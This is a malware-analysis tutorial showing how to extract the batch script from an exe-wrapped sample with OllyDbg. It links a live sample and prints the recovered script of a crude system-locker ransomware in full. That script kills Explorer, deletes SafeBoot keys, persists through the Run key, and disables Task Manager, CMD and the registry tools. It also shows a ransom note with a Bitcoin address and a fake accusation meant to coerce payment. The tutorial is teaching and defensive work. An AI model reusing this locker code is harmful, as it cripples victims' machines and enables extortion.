Unwrapping Exe ConvertersSamplePlease download the following sample.
Win32.b1t.zipCaution! This is live malware!The password is "infected" without quotes.
Introduction to WrappersThis tutorial will show you how to unwrap a wrapped file using OllyDbg. Wrapped files have a script or executable in their body, which they drop and run upon execution. Typically wrappers create exe files from, e.g., batch scripts, python scripts, jar files, autoit scripts. They are a very mild form of obfuscation, because the script or executable to be wrapped is most of the time encoded or encrypted within the resulting file.
Wrapped files often use the TEMP folder to drop the file, execute the dropped file, then delete it. The biggest difficulty is that the dropped file gets usually deleted before you can copy it. Simple forms of circumventing this situation are mentioned below. In this case we will use OllyDbg to obtain the dropped file.
Method 1: Change the folder permissions- Right-Click the folder, click on Properties
- Click on the Security tab
- If the Security tab is not there, you need to go to the folder options and uncheck Use simple file sharing
- In the Security tab click Add..
- Enter Everyone into the object name box, click OK
- Click on Advanced. Select Everyone, then click on the Edit button
- Place a checkmark in the deny column for delete and delete subfolders and files.
- Click OK until all Windows are closed.
Note: Sometimes this will not work, because wrappers may create a temp file to unpack it, then delete the temp file and create a folder of the same name.
Method 2: Use a file copy scriptSave the following batch file, replace the filename with the actual name of the temp file, and run the script prior to executing the sample. This will only work if you know the name of the temp file beforehand. If the sample creates a random name, you need to use another method to obtain the file.
@echo off
:loop
copy %TEMP%\<filename> .
goto loopMethod 3: Use a debuggerWith a debugger like
OllyDbg, break at a point were all files have been created but not yet deleted and copy them.
AnalysisTake a look at the executable with a hex editor first. Two things might tell you that this is wrapped file.
1. Antivirus detections contain BAT as platform.
2. Plaintext in the executable hints to the use of a b2e (batch to exe) converter.
That plaintext part looks as follows:
Overwrite? An unknown error occured. The program will be terminated. \ B D F I b2eincfilepath N O P S X open b2eargs Continue? extd b2etempfile b2eincfile @shift /0 Password Choose a location to save the files. -b2epass b2eprogramshortname Please enter the password. Error! b2eincfilecount The file
This program is not supported on your operating system. b2eprogramfilename Can not create some of your include files. b2eprogramname @call:extd Can not allocate the memory. OK b2eprogrampathname b2eextd Wrong password. extd.exe
already exists in the current directory. Overwrite? ÿÿÿÿ ÿÿÿÿ ÿÿÿÿ:extd
@set result=
@%b2eextd% "%~1" "%~2" "%~3" "%~4" "%~5" "%~6" "%~7" "%~8" "%~9" > "%b2etempfile%"
@set /p result= < "%b2etempfile%"
@del "%b2etempfile%"
@goto:eofAlthough this is some batch code, it is not the batch script that we want.
It is time to run the sample in your lab. You will realize soon that the Windows explorer disappears, the desktop is not functional anymore, and any attempts to open taskmanager or the command prompt will fail.
If you restart the machine, you will have the same situation after logging in. This would be typical behaviour for a system locker, but there is no ransom message. It also makes attempts to obtain the batch script more difficult. If you have ProcessExplorer still open, you will be able to kill the process that terminates the explorer. You will also be able to observe that a batch file was created in a randomly named subfolder in TEMP. But the batch file is soon gone after execution.
UnwrappingNow start on a fresh VM and open the sample in OllyDgb. Create a snapshot before you start debugging. Olly wilt break as usual at the entry point of the executable.
Now think about it: What does the sample do before it runs the batch file?
It will write the file to TEMP. So we can set a breakpoint on WriteFile to halt before the TEMP file is written. Do that and press F9 to proceed with execution.
OllyDbg will break in this area within kernel32
Take a look at the registers. You can clearly see that a reference to the batch string is in the EDX register.
Right-click on the address and follow in dump.
The batch string will appear in the dump window and it seems to be complete.
This is a good point in time to create a dump of the process. I used ProcessExplorer in this case.
Now open the dumped memory in a hex editor and search for the beginning of the batch file, e.g., I searched for echo off in ASCII.
Copy and paste the batch file string to a new file. Et voila, you got the complete batch script! The most interesting part comes now. Open the script in a text editor like Notepad++ and analyse the code.
@shift /0
@echo off
color c
taskkill /im explorer.exe /f > nul
Reg Delete HKLM\System\CurrentControlSet\Control\SafeBoot /f > nul
copy %0 C:\Windows\Win32.bat > nul
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Win32 /t REG_SZ /d C:\Windows\Win32.bat /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 2 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 1 /f >nul
cls
title Windows blocked, file encrypt
echo Windows Blocked!
echo Hello, we inform you that your system
has been blocked and all the files are
encrypted for viewing child porn.
You can unlock the system,
for this you need to pay 0.5 BTC ¦ 1G2GAivmaBkTephZsorQsyGFNNdBs3bWMB
in the wallet Bitcoin application is written in your email address to which you will
be sent the code to unlock it.
echo Enter C0d3:
:upo
set /p x=
if %x%==123456789 (echo Windows start!
start explorer
reg Delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 0 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 0 /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 0 /f >nul
exit
) ELSE (
cls
echo ERROR!
echo Enter C0d3:
)
goto upo
This looks like a complete fail, doesn't it?
It is indeed a system locker ransomware, but there will never be a ransom note, because the command prompt is disabled and the ransom message is only shown in the command prompt!
Your task: Imagine a friend of yours got his or her system infected by this system locker. How would you be able to restore the system?
